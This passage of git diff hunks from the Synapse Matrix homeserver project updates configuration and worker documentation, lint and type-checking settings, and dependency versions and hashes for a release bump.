Here is a list of subjects for notification emails that can be set:
* `message_from_person_in_room`: Subject to use to notify about one message from one or more user(s) in a
room which has a name. Defaults to "[%(app)s] You have a message on %(app)s from %(person)s in the %(room)s room..."
* `message_from_person`: Subject to use to notify about one message from one or more user(s) in a
room which doesn't have a name. Defaults to "[%(app)s] You have a message on %(app)s from %(person)s..."
* `messages_from_person`: Subject to use to notify about multiple messages from one or more users in
a room which doesn't have a name. Defaults to "[%(app)s] You have messages on %(app)s from %(person)s..."
* `messages_in_room`: Subject to use to notify about multiple messages in a room which has a
name. Defaults to "[%(app)s] You have messages on %(app)s in the %(room)s room..."
* `messages_in_room_and_others`: Subject to use to notify about multiple messages in multiple rooms.
Defaults to "[%(app)s] You have messages on %(app)s in the %(room)s room and others..."
* `messages_from_person_and_others`: Subject to use to notify about multiple messages from multiple persons in
multiple rooms. This is similar to the setting above except it's used when
the room in which the notification was triggered has no name. Defaults to
"[%(app)s] You have messages on %(app)s from %(person)s and others..."
* `invite_from_person_to_room`: Subject to use to notify about an invite to a room which has a name.
Defaults to "[%(app)s] %(person)s has invited you to join the %(room)s room on %(app)s..."
* `invite_from_person`: Subject to use to notify about an invite to a room which doesn't have a
name. Defaults to "[%(app)s] %(person)s has invited you to chat on %(app)s..."
* `password_reset`: Subject to use when sending a password reset email. Defaults to "[%(server_name)s] Password reset"
* `email_validation`: Subject to use when sending a verification email to assert an address's
ownership. Defaults to "[%(server_name)s] Validate your email"
Example configuration:
```yaml
email:
smtp_host: mail.server
smtp_port: 587
smtp_user: "exampleusername"
smtp_pass: "examplepassword"
force_tls: true
require_transport_security: true
enable_tls: false
notif_from: "Your Friendly %(app)s homeserver <noreply@example.com>"
app_name: my_branded_matrix_server
enable_notifs: true
notif_for_new_users: false
client_base_url: "http://localhost/riot"
validation_token_lifetime: 15m
invite_client_location: https://app.element.io
subjects:
message_from_person_in_room: "[%(app)s] You have a message on %(app)s from %(person)s in the %(room)s room..."
message_from_person: "[%(app)s] You have a message on %(app)s from %(person)s..."
messages_from_person: "[%(app)s] You have messages on %(app)s from %(person)s..."
messages_in_room: "[%(app)s] You have messages on %(app)s in the %(room)s room..."
messages_in_room_and_others: "[%(app)s] You have messages on %(app)s in the %(room)s room and others..."
messages_from_person_and_others: "[%(app)s] You have messages on %(app)s from %(person)s and others..."
invite_from_person_to_room: "[%(app)s] %(person)s has invited you to join the %(room)s room on %(app)s..."
invite_from_person: "[%(app)s] %(person)s has invited you to chat on %(app)s..."
password_reset: "[%(server_name)s] Password reset"
email_validation: "[%(server_name)s] Validate your email"
```
## Homeserver blocking
Useful options for Synapse admins.
@ -1148,7 +1257,7 @@ number of entries that can be stored.
* `max_cache_memory_usage` sets a ceiling on how much memory the cache can use before caches begin to be continuously evicted.
They will continue to be evicted until the memory usage drops below the `target_memory_usage`, set in
the setting below, or until the `min_cache_ttl` is hit. There is no default value for this option.
* `target_memory_usage` sets a rough target for the desired memory usage of the caches. There is no default value
* `target_cache_memory_usage` sets a rough target for the desired memory usage of the caches. There is no default value
for this option.
* `min_cache_ttl` sets a limit under which newer cache entries are not evicted and is only applied when
caches are actively being evicted/`max_cache_memory_usage` has been exceeded. This is to protect hot caches
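A sketch of how these sub-options fit together, assuming they sit under `caches.cache_autotuning` as in the rest of this section:
```yaml
caches:
  cache_autotuning:
    max_cache_memory_usage: 1024M   # ceiling before continuous eviction starts
    target_cache_memory_usage: 758M # rough target to evict down to
    min_cache_ttl: 5m               # entries newer than this are protected
```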
@ -1212,7 +1321,7 @@ Associated sub-options:
connection pool. For a reference to valid arguments, see:
* for [sqlite](https://docs.python.org/3/library/sqlite3.html#sqlite3.connect)
* for [postgres](https://www.postgresql.org/docs/current/libpq-connect.html#LIBPQ-PARAMKEYWORDS)
* for [the connection pool](https://twistedmatrix.com/documents/current/api/twisted.enterprise.adbapi.ConnectionPool.html#__init__)
* for [the connection pool](https://docs.twistedmatrix.com/en/stable/api/twisted.enterprise.adbapi.ConnectionPool.html#__init__)
For more information on using Synapse with Postgres,
see [here](../../postgres.md).
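For example, a sketch of a Postgres `database` block passing pool arguments (credentials and pool sizes are placeholders):
```yaml
database:
  name: psycopg2
  args:
    user: synapse_user
    password: secretpassword
    database: synapse
    host: localhost
    cp_min: 5   # minimum size of the Twisted connection pool
    cp_max: 10  # maximum size of the Twisted connection pool
```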
@ -2514,18 +2623,18 @@ state events are shared with users:
- `m.room.topic`
To change the default behavior, use the following sub-options:
* `disable_default_event_types`: boolean. Set to `true` to disable the above
defaults. If this is enabled, only the event types listed in
`additional_event_types` are shared. Defaults to `false`.
* `additional_event_types`: A list of additional state events to include in the
events to be shared. By default, this list is empty (so only the default event
types are shared).
Each entry in this list should be either a single string or a list of two
strings.
* A standalone string `t` represents all events with type `t` (i.e.
with no restrictions on state keys).
* A pair of strings `[t, s]` represents a single event with type `t` and
state key `s`. The same type can appear in two entries with different state
keys: in this situation, both state keys are included in prejoin state.
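A sketch combining both entry forms (the event types are hypothetical, and the top-level option is assumed to be `room_prejoin_state`):
```yaml
room_prejoin_state:
  disable_default_event_types: false
  additional_event_types:
    # A standalone string: share all events of this type.
    - "org.example.custom.event.typeA"
    # A [type, state_key] pair: share only the event with state key "foo".
    - ["org.example.custom.event.typeB", "foo"]
```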
@ -2944,8 +3053,13 @@ Options for each entry include:
values are `client_secret_basic` (default), `client_secret_post` and
`none`.
* `pkce_method`: Whether to use proof key for code exchange when requesting
and exchanging the token. Valid values are: `auto`, `always`, or `never`. Defaults
to `auto`, which uses PKCE if supported during metadata discovery. Set to `always`
to force enable PKCE or `never` to force disable PKCE.
* `scopes`: list of scopes to request. This should normally include the "openid"
scope. Defaults to ["openid"].
scope. Defaults to `["openid"]`.
* `authorization_endpoint`: the oauth2 authorization endpoint. Required if
provider discovery is disabled.
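As a sketch, forcing PKCE for one provider (the issuer and client details are placeholders):
```yaml
oidc_providers:
  - idp_id: example
    idp_name: Example
    issuer: "https://id.example.com/"
    client_id: "your-client-id"
    client_auth_method: none
    pkce_method: always  # use PKCE even if discovery does not advertise support
    scopes: ["openid", "profile"]
```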
@ -2989,17 +3103,35 @@ Options for each entry include:
For the default provider, the following settings are available:
* `subject_template`: Jinja2 template for a unique identifier for the user.
Defaults to `{{ user.sub }}`, which OpenID Connect compliant providers should provide.
This replaces and overrides `subject_claim`.
* `subject_claim`: name of the claim containing a unique identifier
for the user. Defaults to 'sub', which OpenID Connect
compliant providers should provide.
*Deprecated in Synapse v1.75.0.*
* `picture_template`: Jinja2 template for a URL for the user's profile picture.
Defaults to `{{ user.picture }}`, which OpenID Connect compliant providers should
provide; it has to refer to a direct image file such as a PNG, JPEG, or GIF file.
This replaces and overrides `picture_claim`.
Currently only supported in monolithic (single-process) server configurations
where the media repository runs within the Synapse process.
* `picture_claim`: name of the claim containing a URL for the user's profile picture.
Defaults to 'picture', which OpenID Connect compliant providers should provide;
it has to refer to a direct image file such as a PNG, JPEG, or GIF file.
Currently only supported in monolithic (single-process) server configurations
where the media repository runs within the Synapse process.
*Deprecated in Synapse v1.75.0.*
* `localpart_template`: Jinja2 template for the localpart of the MXID.
If this is not set, the user will be prompted to choose their
own username (see the documentation for the `sso_auth_account_details.html`
@ -3259,114 +3391,6 @@ ui_auth:
session_timeout: "15s"
```
---
### `email`
Configuration for sending emails from Synapse.
Server admins can configure custom templates for email content. See
[here](../../templates.md) for more information.
This setting has the following sub-options:
* `smtp_host`: The hostname of the outgoing SMTP server to use. Defaults to 'localhost'.
* `smtp_port`: The port on the mail server for outgoing SMTP. Defaults to 465 if `force_tls` is true, else 25.
_Changed in Synapse 1.64.0:_ the default port is now aware of `force_tls`.
* `smtp_user` and `smtp_pass`: Username/password for authentication to the SMTP server. By default, no
authentication is attempted.
* `force_tls`: By default, Synapse connects over plain text and then optionally upgrades
to TLS via STARTTLS. If this option is set to true, TLS is used from the start (Implicit TLS),
and the option `require_transport_security` is ignored.
It is recommended to enable this if supported by your mail server.
_New in Synapse 1.64.0._
* `require_transport_security`: Set to true to require TLS transport security for SMTP.
By default, Synapse will connect over plain text, and will then switch to
TLS via STARTTLS *if the SMTP server supports it*. If this option is set,
Synapse will refuse to connect unless the server supports STARTTLS.
* `enable_tls`: By default, if the server supports TLS, it will be used, and the server
must present a certificate that is valid for 'smtp_host'. If this option
is set to false, TLS will not be used.
* `notif_from`: defines the "From" address to use when sending emails.
It must be set if email sending is enabled. The placeholder '%(app)s' will be replaced by the application name,
which is normally set in `app_name`, but may be overridden by the
Matrix client application. Note that the placeholder must be written '%(app)s', including the
trailing 's'.
* `app_name`: defines the default value for '%(app)s' in `notif_from` and email
subjects. It defaults to 'Matrix'.
* `enable_notifs`: Set to true to enable sending emails for messages that the user
has missed. Disabled by default.
* `notif_for_new_users`: Set to false to disable automatic subscription to email
notifications for new users. Enabled by default.
* `client_base_url`: Custom URL for client links within the email notifications. By default
links will be based on "https://matrix.to". (This setting used to be called `riot_base_url`;
the old name is still supported for backwards-compatibility but is now deprecated.)
* `validation_token_lifetime`: Configures the time that a validation email will expire after sending.
Defaults to 1h.
* `invite_client_location`: The web client location to direct users to during an invite. This is passed
to the identity server as the `org.matrix.web_client_location` key. Defaults
to unset, giving no guidance to the identity server.
* `subjects`: Subjects to use when sending emails from Synapse. The placeholder '%(app)s' will
be replaced with the value of the `app_name` setting, or by a value dictated by the Matrix client application.
In addition, each subject can use the following placeholders: '%(person)s', which will be replaced by the displayname
of the user(s) that sent the message(s), e.g. "Alice and Bob", and '%(room)s', which will be replaced by the name of the room the
message(s) have been sent to, e.g. "My super room". In addition, emails related to account administration
can use the '%(server_name)s' placeholder, which will be replaced by the value of the
`server_name` setting in your Synapse configuration.
Here is a list of subjects for notification emails that can be set:
* `message_from_person_in_room`: Subject to use to notify about one message from one or more user(s) in a
room which has a name. Defaults to "[%(app)s] You have a message on %(app)s from %(person)s in the %(room)s room..."
* `message_from_person`: Subject to use to notify about one message from one or more user(s) in a
room which doesn't have a name. Defaults to "[%(app)s] You have a message on %(app)s from %(person)s..."
* `messages_from_person`: Subject to use to notify about multiple messages from one or more users in
a room which doesn't have a name. Defaults to "[%(app)s] You have messages on %(app)s from %(person)s..."
* `messages_in_room`: Subject to use to notify about multiple messages in a room which has a
name. Defaults to "[%(app)s] You have messages on %(app)s in the %(room)s room..."
* `messages_in_room_and_others`: Subject to use to notify about multiple messages in multiple rooms.
Defaults to "[%(app)s] You have messages on %(app)s in the %(room)s room and others..."
* `messages_from_person_and_others`: Subject to use to notify about multiple messages from multiple persons in
multiple rooms. This is similar to the setting above except it's used when
the room in which the notification was triggered has no name. Defaults to
"[%(app)s] You have messages on %(app)s from %(person)s and others..."
* `invite_from_person_to_room`: Subject to use to notify about an invite to a room which has a name.
Defaults to "[%(app)s] %(person)s has invited you to join the %(room)s room on %(app)s..."
* `invite_from_person`: Subject to use to notify about an invite to a room which doesn't have a
name. Defaults to "[%(app)s] %(person)s has invited you to chat on %(app)s..."
* `password_reset`: Subject to use when sending a password reset email. Defaults to "[%(server_name)s] Password reset"
* `email_validation`: Subject to use when sending a verification email to assert an address's
ownership. Defaults to "[%(server_name)s] Validate your email"
Example configuration:
```yaml
email:
smtp_host: mail.server
smtp_port: 587
smtp_user: "exampleusername"
smtp_pass: "examplepassword"
force_tls: true
require_transport_security: true
enable_tls: false
notif_from: "Your Friendly %(app)s homeserver <noreply@example.com>"
app_name: my_branded_matrix_server
enable_notifs: true
notif_for_new_users: false
client_base_url: "http://localhost/riot"
validation_token_lifetime: 15m
invite_client_location: https://app.element.io
subjects:
message_from_person_in_room: "[%(app)s] You have a message on %(app)s from %(person)s in the %(room)s room..."
message_from_person: "[%(app)s] You have a message on %(app)s from %(person)s..."
messages_from_person: "[%(app)s] You have messages on %(app)s from %(person)s..."
messages_in_room: "[%(app)s] You have messages on %(app)s in the %(room)s room..."
messages_in_room_and_others: "[%(app)s] You have messages on %(app)s in the %(room)s room and others..."
messages_from_person_and_others: "[%(app)s] You have messages on %(app)s from %(person)s and others..."
invite_from_person_to_room: "[%(app)s] %(person)s has invited you to join the %(room)s room on %(app)s..."
invite_from_person: "[%(app)s] %(person)s has invited you to chat on %(app)s..."
password_reset: "[%(server_name)s] Password reset"
email_validation: "[%(server_name)s] Validate your email"
```
---
## Push
Configuration settings related to push notifications
@ -3840,6 +3864,48 @@ Example configuration:
```yaml
run_background_tasks_on: worker1
```
---
### `update_user_directory_from_worker`
The [worker](../../workers.md#updating-the-user-directory) that is used to
update the user directory. If not provided this defaults to the main process.
Example configuration:
```yaml
update_user_directory_from_worker: worker1
```
_Added in Synapse 1.59.0._
---
### `notify_appservices_from_worker`
The [worker](../../workers.md#notifying-application-services) that is used to
send output traffic to Application Services. If not provided this defaults
to the main process.
Example configuration:
```yaml
notify_appservices_from_worker: worker1
```
_Added in Synapse 1.59.0._
---
### `media_instance_running_background_jobs`
The [worker](../../workers.md#synapseappmedia_repository) that is used to run
background tasks for media repository. If running multiple media repositories
you must configure a single instance to run the background tasks. If not provided
this defaults to the main process or your single `media_repository` worker.
Example configuration:
```yaml
media_instance_running_background_jobs: worker1
```
_Added in Synapse 1.16.0._
---
### `redis`
@ -3957,7 +4023,7 @@ worker_listeners:
### `worker_daemonize`
Specifies whether the worker should be started as a daemon process.
If Synapse is being managed by [systemd](../../systemd-with-workers/README.md), this option
If Synapse is being managed by [systemd](../../systemd-with-workers/), this option
must be omitted or set to `false`.
Defaults to `false`.
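A sketch of a worker config fragment leaving daemonization off (as required under systemd):
```yaml
worker_daemonize: false
```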


@ -157,7 +157,7 @@ Finally, you need to start your worker processes. This can be done with either
`synctl` or your distribution's preferred service manager such as `systemd`. We
recommend the use of `systemd` where available: for information on setting up
`systemd` to start synapse workers, see
[Systemd with Workers](systemd-with-workers). To use `synctl`, see
[Systemd with Workers](systemd-with-workers/). To use `synctl`, see
[Using synctl with Workers](synctl_workers.md).
@ -386,7 +386,7 @@ so. It will then pass those events over HTTP replication to any configured event
persisters (or the main process if none are configured).
Note that `event_creator`s and `event_persister`s are implemented using the same
[`synapse.app.generic_worker`](#synapse.app.generic_worker).
[`synapse.app.generic_worker`](#synapseappgeneric_worker).
An example [`stream_writers`](usage/configuration/config_documentation.md#stream_writers)
configuration with multiple writers:
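A sketch of such a configuration (the worker names are placeholders):
```yaml
stream_writers:
  events: event_persister1
  typing: typing_writer1
```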
@ -465,7 +465,8 @@ An example for a dedicated background worker instance:
You can designate one generic worker to update the user directory.
Specify its name in the shared configuration as follows:
Specify its name in the [shared configuration](usage/configuration/config_documentation.md#update_user_directory_from_worker)
as follows:
```yaml
update_user_directory_from_worker: worker_name
@ -490,7 +491,8 @@ worker application type.
You can designate one generic worker to send output traffic to Application Services.
Doesn't handle any REST endpoints itself, but you should specify its name in the
shared configuration as follows:
[shared configuration](usage/configuration/config_documentation.md#notify_appservices_from_worker)
as follows:
```yaml
notify_appservices_from_worker: worker_name
@ -502,11 +504,38 @@ after setting this option in the shared configuration!
This style of configuration supersedes the legacy `synapse.app.appservice`
worker application type.
#### Push Notifications
You can designate a generic worker to send push notifications to
a [push gateway](https://spec.matrix.org/v1.5/push-gateway-api/) such as
[sygnal](https://github.com/matrix-org/sygnal), and to send notification emails.
This will stop the main process from sending push notifications.
The workers responsible for sending push notifications can be defined using the
[`pusher_instances`](usage/configuration/config_documentation.md#pusher_instances)
option. For example:
```yaml
pusher_instances:
- pusher_worker1
- pusher_worker2
```
Multiple workers can be added to this map, in which case the work is balanced
across them. Ensure the main process and all pusher workers are restarted after changing
this option.
These workers don't need to accept incoming HTTP requests to send push notifications,
so no additional reverse proxy configuration is required for pusher workers.
This style of configuration supersedes the legacy `synapse.app.pusher`
worker application type.
### `synapse.app.pusher`
It is likely this option will be deprecated in the future and is not recommended for new
installations. Instead, [use `synapse.app.generic_worker` with the `pusher_instances`](usage/configuration/config_documentation.md#pusher_instances).
installations. Instead, [use `synapse.app.generic_worker` with the `pusher_instances`](#push-notifications).
Handles sending push notifications to sygnal and email. Doesn't handle any
REST endpoints itself, but you should set
@ -547,7 +576,7 @@ Note this worker cannot be load-balanced: only one instance should be active.
### `synapse.app.federation_sender`
It is likely this option will be deprecated in the future and is not recommended for
new installations. Instead, [use `synapse.app.generic_worker` with the `federation_sender_instances`](usage/configuration/config_documentation.md#federation_sender_instances).
Handles sending federation traffic to other servers. Doesn't handle any
REST endpoints itself, but you should set
@ -606,7 +635,9 @@ expose the `media` resource. For example:
```
Note that if running multiple media repositories they must be on the same server
and you must configure a single instance to run the background tasks, e.g.:
and you must specify a single instance to run the background tasks in the
[shared configuration](usage/configuration/config_documentation.md#media_instance_running_background_jobs),
e.g.:
```yaml
media_instance_running_background_jobs: "media-repository-1"


@ -36,9 +36,6 @@ exclude = (?x)
|tests/api/test_ratelimiting.py
|tests/app/test_openid_listener.py
|tests/appservice/test_scheduler.py
|tests/config/test_cache.py
|tests/config/test_tls.py
|tests/crypto/test_keyring.py
|tests/events/test_presence_router.py
|tests/events/test_utils.py
|tests/federation/test_federation_catch_up.py
@ -89,19 +86,19 @@ disallow_untyped_defs = False
[mypy-tests.*]
disallow_untyped_defs = False
[mypy-tests.config.test_api]
[mypy-tests.config.*]
disallow_untyped_defs = True
[mypy-tests.crypto.*]
disallow_untyped_defs = True
[mypy-tests.federation.transport.test_client]
disallow_untyped_defs = True
[mypy-tests.handlers.test_sso]
[mypy-tests.handlers.*]
disallow_untyped_defs = True
[mypy-tests.handlers.test_user_directory]
disallow_untyped_defs = True
[mypy-tests.metrics.test_background_process_metrics]
[mypy-tests.metrics.*]
disallow_untyped_defs = True
[mypy-tests.push.test_bulk_push_rule_evaluator]

poetry.lock: file diff suppressed because it is too large (746 changes).


@ -40,6 +40,46 @@ target-version = ['py37', 'py38', 'py39', 'py310']
# https://black.readthedocs.io/en/stable/usage_and_configuration/file_collection_and_discovery.html#gitignore
# Use `extend-exclude` if you want to exclude something in addition to this.
[tool.ruff]
line-length = 88
# See https://github.com/charliermarsh/ruff/#pycodestyle
# for error codes. The ones we ignore are:
# E731: do not assign a lambda expression, use a def
# E501: Line too long (black enforces this for us)
#
# See https://github.com/charliermarsh/ruff/#pyflakes
# F401: unused import
# F811: Redefinition of unused
# F821: Undefined name
#
# flake8-bugbear compatible checks. Its error codes are described at
# https://github.com/charliermarsh/ruff/#flake8-bugbear
# B019: Use of functools.lru_cache or functools.cache on methods can lead to memory leaks
# B023: Functions defined inside a loop must not use variables redefined in the loop
# B024: Abstract base class with no abstract method.
ignore = [
"B019",
"B023",
"B024",
"E501",
"E731",
"F401",
"F811",
"F821",
]
select = [
# pycodestyle checks.
"E",
"W",
# pyflakes checks.
"F",
# flake8-bugbear checks.
"B0",
# flake8-comprehensions checks.
"C4",
]
[tool.isort]
line_length = 88
sections = ["FUTURE", "STDLIB", "THIRDPARTY", "TWISTED", "FIRSTPARTY", "TESTS", "LOCALFOLDER"]
@ -57,7 +97,7 @@ manifest-path = "rust/Cargo.toml"
[tool.poetry]
name = "matrix-synapse"
version = "1.74.0"
version = "1.75.0"
description = "Homeserver for the Matrix decentralised comms protocol"
authors = ["Matrix.org Team and Contributors <packages@matrix.org>"]
license = "Apache-2.0"
@ -136,7 +176,7 @@ Twisted = {extras = ["tls"], version = ">=18.9.0"}
treq = ">=15.1"
# Twisted has required pyopenssl 16.0 since about Twisted 16.6.
pyOpenSSL = ">=16.0.0"
PyYAML = ">=3.11"
PyYAML = ">=3.13"
pyasn1 = ">=0.1.9"
pyasn1-modules = ">=0.0.7"
bcrypt = ">=3.1.7"
@ -274,12 +314,10 @@ all = [
]
[tool.poetry.dev-dependencies]
## We pin black so that our tests don't start failing on new releases.
# We pin black so that our tests don't start failing on new releases.
isort = ">=5.10.1"
black = ">=22.3.0"
flake8-comprehensions = "*"
flake8-bugbear = ">=21.3.2"
flake8 = "*"
ruff = "0.0.215"
# Typechecking
mypy = "*"


@ -1,6 +1,6 @@
attrs==22.1.0 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:29adc2665447e5191d0e7c568fde78b21f9672d344281d0c6e1ab085429b22b6 \
--hash=sha256:86efa402f67bf2df34f51a335487cf46b1ec130d02b8d39fd248abfd30da551c
attrs==22.2.0 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:29e95c7f6778868dbd49170f98f8818f78f3dc5e0e37c0b1f474e3561b240836 \
--hash=sha256:c9227bfc2f01993c03f68db37d1d15c9690188323c067c641f1a35ca58185f99
authlib==1.2.0 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:4ddf4fd6cfa75c9a460b361d4bd9dac71ffda0be879dbe4292a02e92349ad55a \
--hash=sha256:4fa3e80883a5915ef9f5bc28630564bc4ed5b5af39812a3ff130ec76bd631e9d
@ -38,57 +38,71 @@ canonicaljson==1.6.4 ; python_full_version >= "3.7.1" and python_full_version <
certifi==2022.12.7 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:35824b4c3a97115964b408844d64aa14db1cc518f6562e8d7261699d1350a9e3 \
--hash=sha256:4ad3232f5e926d6718ec31cfc1fcadfde020920e278684144551c91769c7bc18
cffi==1.15.0 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:00c878c90cb53ccfaae6b8bc18ad05d2036553e6d9d1d9dbcf323bbe83854ca3 \
--hash=sha256:0104fb5ae2391d46a4cb082abdd5c69ea4eab79d8d44eaaf79f1b1fd806ee4c2 \
--hash=sha256:06c48159c1abed75c2e721b1715c379fa3200c7784271b3c46df01383b593636 \
--hash=sha256:0808014eb713677ec1292301ea4c81ad277b6cdf2fdd90fd540af98c0b101d20 \
--hash=sha256:10dffb601ccfb65262a27233ac273d552ddc4d8ae1bf93b21c94b8511bffe728 \
--hash=sha256:14cd121ea63ecdae71efa69c15c5543a4b5fbcd0bbe2aad864baca0063cecf27 \
--hash=sha256:17771976e82e9f94976180f76468546834d22a7cc404b17c22df2a2c81db0c66 \
--hash=sha256:181dee03b1170ff1969489acf1c26533710231c58f95534e3edac87fff06c443 \
--hash=sha256:23cfe892bd5dd8941608f93348c0737e369e51c100d03718f108bf1add7bd6d0 \
--hash=sha256:263cc3d821c4ab2213cbe8cd8b355a7f72a8324577dc865ef98487c1aeee2bc7 \
--hash=sha256:2756c88cbb94231c7a147402476be2c4df2f6078099a6f4a480d239a8817ae39 \
--hash=sha256:27c219baf94952ae9d50ec19651a687b826792055353d07648a5695413e0c605 \
--hash=sha256:2a23af14f408d53d5e6cd4e3d9a24ff9e05906ad574822a10563efcef137979a \
--hash=sha256:31fb708d9d7c3f49a60f04cf5b119aeefe5644daba1cd2a0fe389b674fd1de37 \
--hash=sha256:3415c89f9204ee60cd09b235810be700e993e343a408693e80ce7f6a40108029 \
--hash=sha256:3773c4d81e6e818df2efbc7dd77325ca0dcb688116050fb2b3011218eda36139 \
--hash=sha256:3b96a311ac60a3f6be21d2572e46ce67f09abcf4d09344c49274eb9e0bf345fc \
--hash=sha256:3f7d084648d77af029acb79a0ff49a0ad7e9d09057a9bf46596dac9514dc07df \
--hash=sha256:41d45de54cd277a7878919867c0f08b0cf817605e4eb94093e7516505d3c8d14 \
--hash=sha256:4238e6dab5d6a8ba812de994bbb0a79bddbdf80994e4ce802b6f6f3142fcc880 \
--hash=sha256:45db3a33139e9c8f7c09234b5784a5e33d31fd6907800b316decad50af323ff2 \
--hash=sha256:45e8636704eacc432a206ac7345a5d3d2c62d95a507ec70d62f23cd91770482a \
--hash=sha256:4958391dbd6249d7ad855b9ca88fae690783a6be9e86df65865058ed81fc860e \
--hash=sha256:4a306fa632e8f0928956a41fa8e1d6243c71e7eb59ffbd165fc0b41e316b2474 \
--hash=sha256:57e9ac9ccc3101fac9d6014fba037473e4358ef4e89f8e181f8951a2c0162024 \
--hash=sha256:59888172256cac5629e60e72e86598027aca6bf01fa2465bdb676d37636573e8 \
--hash=sha256:5e069f72d497312b24fcc02073d70cb989045d1c91cbd53979366077959933e0 \
--hash=sha256:64d4ec9f448dfe041705426000cc13e34e6e5bb13736e9fd62e34a0b0c41566e \
--hash=sha256:6dc2737a3674b3e344847c8686cf29e500584ccad76204efea14f451d4cc669a \
--hash=sha256:74fdfdbfdc48d3f47148976f49fab3251e550a8720bebc99bf1483f5bfb5db3e \
--hash=sha256:75e4024375654472cc27e91cbe9eaa08567f7fbdf822638be2814ce059f58032 \
--hash=sha256:786902fb9ba7433aae840e0ed609f45c7bcd4e225ebb9c753aa39725bb3e6ad6 \
--hash=sha256:8b6c2ea03845c9f501ed1313e78de148cd3f6cad741a75d43a29b43da27f2e1e \
--hash=sha256:91d77d2a782be4274da750752bb1650a97bfd8f291022b379bb8e01c66b4e96b \
--hash=sha256:91ec59c33514b7c7559a6acda53bbfe1b283949c34fe7440bcf917f96ac0723e \
--hash=sha256:920f0d66a896c2d99f0adbb391f990a84091179542c205fa53ce5787aff87954 \
--hash=sha256:a5263e363c27b653a90078143adb3d076c1a748ec9ecc78ea2fb916f9b861962 \
--hash=sha256:abb9a20a72ac4e0fdb50dae135ba5e77880518e742077ced47eb1499e29a443c \
--hash=sha256:c2051981a968d7de9dd2d7b87bcb9c939c74a34626a6e2f8181455dd49ed69e4 \
--hash=sha256:c21c9e3896c23007803a875460fb786118f0cdd4434359577ea25eb556e34c55 \
--hash=sha256:c2502a1a03b6312837279c8c1bd3ebedf6c12c4228ddbad40912d671ccc8a962 \
--hash=sha256:d4d692a89c5cf08a8557fdeb329b82e7bf609aadfaed6c0d79f5a449a3c7c023 \
--hash=sha256:da5db4e883f1ce37f55c667e5c0de439df76ac4cb55964655906306918e7363c \
--hash=sha256:e7022a66d9b55e93e1a845d8c9eba2a1bebd4966cd8bfc25d9cd07d515b33fa6 \
--hash=sha256:ef1f279350da2c586a69d32fc8733092fd32cc8ac95139a00377841f59a3f8d8 \
--hash=sha256:f54a64f8b0c8ff0b64d18aa76675262e1700f3995182267998c31ae974fbc382 \
--hash=sha256:f5c7150ad32ba43a07c4479f40241756145a1f03b43480e058cfd862bf5041c7 \
--hash=sha256:f6f824dc3bce0edab5f427efcfb1d63ee75b6fcb7282900ccaf925be84efb0fc \
--hash=sha256:fd8a250edc26254fe5b33be00402e6d287f562b6a5b2152dec302fa15bb3e997 \
--hash=sha256:ffaa5c925128e29efbde7301d8ecaf35c8c60ffbcd6a1ffd3a552177c8e5e796
cffi==1.15.1 ; python_full_version >= "3.7.1" and python_full_version < "4.0.0" \
--hash=sha256:00a9ed42e88df81ffae7a8ab6d9356b371399b91dbdf0c3cb1e84c03a13aceb5 \
--hash=sha256:03425bdae262c76aad70202debd780501fabeaca237cdfddc008987c0e0f59ef \
--hash=sha256:04ed324bda3cda42b9b695d51bb7d54b680b9719cfab04227cdd1e04e5de3104 \
--hash=sha256:0e2642fe3142e4cc4af0799748233ad6da94c62a8bec3a6648bf8ee68b1c7426 \
--hash=sha256:173379135477dc8cac4bc58f45db08ab45d228b3363adb7af79436135d028405 \
--hash=sha256:198caafb44239b60e252492445da556afafc7d1e3ab7a1fb3f0584ef6d742375 \
--hash=sha256:1e74c6b51a9ed6589199c787bf5f9875612ca4a8a0785fb2d4a84429badaf22a \
--hash=sha256:2012c72d854c2d03e45d06ae57f40d78e5770d252f195b93f581acf3ba44496e \
--hash=sha256:21157295583fe8943475029ed5abdcf71eb3911894724e360acff1d61c1d54bc \
--hash=sha256:2470043b93ff09bf8fb1d46d1cb756ce6132c54826661a32d4e4d132e1977adf \
--hash=sha256:285d29981935eb726a4399badae8f0ffdff4f5050eaa6d0cfc3f64b857b77185 \
--hash=sha256:30d78fbc8ebf9c92c9b7823ee18eb92f2e6ef79b45ac84db507f52fbe3ec4497 \
--hash=sha256:320dab6e7cb2eacdf0e658569d2575c4dad258c0fcc794f46215e1e39f90f2c3 \
--hash=sha256:33ab79603146aace82c2427da5ca6e58f2b3f2fb5da893ceac0c42218a40be35 \
--hash=sha256:3548db281cd7d2561c9ad9984681c95f7b0e38881201e157833a2342c30d5e8c \
--hash=sha256:3799aecf2e17cf585d977b780ce79ff0dc9b78d799fc694221ce814c2c19db83 \
--hash=sha256:39d39875251ca8f612b6f33e6b1195af86d1b3e60086068be9cc053aa4376e21 \
--hash=sha256:3b926aa83d1edb5aa5b427b4053dc420ec295a08e40911296b9eb1b6170f6cca \
--hash=sha256:3bcde07039e586f91b45c88f8583ea7cf7a0770df3a1649627bf598332cb6984 \
--hash=sha256:3d08afd128ddaa624a48cf2b859afef385b720bb4b43df214f85616922e6a5ac \
--hash=sha256:3eb6971dcff08619f8d91607cfc726518b6fa2a9eba42856be181c6d0d9515fd \
--hash=sha256:40f4774f5a9d4f5e344f31a32b5096977b5d48560c5592e2f3d2c4374bd543ee \
--hash=sha256:4289fc34b2f5316fbb762d75362931e351941fa95fa18789191b33fc4cf9504a \
--hash=sha256:470c103ae716238bbe698d67ad020e1db9d9dba34fa5a899b5e21577e6d52ed2 \
--hash=sha256:4f2c9f67e9821cad2e5f480bc8d83b8742896f1242dba247911072d4fa94c192 \
--hash=sha256:50a74364d85fd319352182ef59c5c790484a336f6db772c1a9231f1c3ed0cbd7 \
--hash=sha256:54a2db7b78338edd780e7ef7f9f6c442500fb0d41a5a4ea24fff1c929d5af585 \
--hash=sha256:5635bd9cb9731e6d4a1132a498dd34f764034a8ce60cef4f5319c0541159392f \
--hash=sha256:59c0b02d0a6c384d453fece7566d1c7e6b7bae4fc5874ef2ef46d56776d61c9e \
--hash=sha256:5d598b938678ebf3c67377cdd45e09d431369c3b1a5b331058c338e201f12b27 \
--hash=sha256:5df2768244d19ab7f60546d0c7c63ce1581f7af8b5de3eb3004b9b6fc8a9f84b \
